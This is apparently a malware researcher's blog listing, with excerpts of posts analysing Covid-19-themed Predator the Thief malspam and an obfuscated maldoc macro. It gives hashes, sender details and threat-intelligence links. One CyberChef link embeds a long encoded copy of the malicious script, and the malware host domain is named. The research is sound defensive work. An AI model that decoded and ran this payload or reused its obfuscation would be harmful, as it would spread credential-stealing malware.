2020-03-20 More Predator The Thief Malspam – Covid-19 Themed

Meta ===== From: *.xyz Subject: Various Covid-19 Attachment: covidXX_form.zip This looks to be related to Predator the Thief malspam based on the final script that gets executed which looks very close to the sample that I posted about over here. The zip file and VBScript can be found in my Github repo here. Here is the code in the actual VBScript. And then with it decoded (first pass). Which leads to this final code being runned on the system. Reference ========== – http://urlhaus.abuse.ch/browse.php?search=show1.website – http://malshare.com/search.php?query=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c – http://bazaar.abuse.ch/browse.php?search=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c – http://app.any.run/tasks/8f771d9c-355f-4262-bac0-0a1927f52222/ – http://gchq.github.io/CyberChef/#recipe=Reverse(‘Character’)From_Base64(‘A-Za-z0-9%2B/%3D’,true)Remove_null_bytes()&input=PT1BQTNBd2FBVUdBNEFRYUFBQ0EwQndjQWtHQU1CQWRBNEdBbEJRYkFVSEFuQmdjQUVFQXRBQUlBa0dBdEJ3TkFFREF5QkFJQU1IQXpCUVpBTUdBdkJnY0FBRkF0QUFkQUlIQWhCQWRBTUZBZ0FBSUFzREEzQXdhQVVHQTRBUWFBQUNBMEJnZUFVR0FyQmdhQUFDQWxCQVpBOEdBakJRWkFRR0F0QUFJQXdHQXBCQWRBVUhBMEJnY0FVR0FqQkFJQXNEQWlBQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBQUNBb0JBZEFFR0FRQlFMQUFDQXVCd2JBa0dBMEJRWUFNR0F2QkFUQTBDQTBCUVpBTUZBZ0F3T0FJQ0F0QndiQU1HQXVBUWVBOEVBWkJBVUFrR0FjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBQWRBb0hBbEJ3YUFvR0FjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBUWJBOEdBakJnTEFrR0F0QndOQUVEQXlCQVhBQUZBTkJRUkFRRkE2QWdkQTRHQWxCQUpBSUNBZ0FnYkE4R0FwQkFkQUVHQXVCUWFBUUhBekJRWkFRRUF0QUFJQVFIQWhCQVpBNENBNUJ3VEFrRkFRQlFhQThDQWxCQWRBa0dBekJnWUFVR0EzQmdMQUVEQTNCd2JBZ0dBekJ3TEE4Q0E2QUFjQVFIQTBCQWFBd0NBMEJRWUFRR0F1QUFUQUVHQTVCUVpBZ0VBdkFRWkFRSEFwQndjQUlHQWxCd2RBNENBeEF3ZEE4R0FvQndjQThDQXZBZ09BQUhBMEJBZEFnR0FzQUFkQUVHQWtCZ0xBTUZBQkJnY0FVR0FQQndMQVVHQTBCUWFBTUhBaUJRWkFjSEF1QVFNQWNIQXZCQWFBTUhBdkF3TEFvREF3QkFkQVFIQW9CQUlBVUdBakJnY0FVSEF2QndVQTBDQWdBZ2NBVUdBbUJ3Y0E0R0FoQmdjQVFGQXpCQWRBa0dBQ0JRTEFRSEF5QlFZQVFIQVRCQUlBc0RBeUJRWkFZR0F6QmdiQUVHQXlCQVZBTUhBMEJRYUFJRUFnQVFaQXdHQTFCQVpBOEdBTkJRTEFRSEF5QndiQUFIQXRCUVM Artifacts ========== Email hashes ————- 182a2cc132f77bacda747c8b36ae82d807e5a3cee01c734deb29f2598b992918 —— ahpwzh909165720504.eml b23c073099a90b2d42c12c05ed86b09fc8ca563b044a411db55a066ce717cb69…

Continue reading

2020-03-18 Deobfuscation of MalDoc script – Possibly Predator the Thief

Meta ====== From: Debt Collections Agency Houston Subject: Collection letter for Account Identification number 021621495WZ Attachment: Word file I came across a piece of malspam that caught my eye. I did not try to run this since it was not responding in Any.Run and based on the results from URLHaus, the site was taken offline. Looking at VT and some other sites, I was not able to find any more information about this maldoc. The fun part with this one was trying to figure out what the macro was doing without having to execute it. Based on what I saw…

Continue reading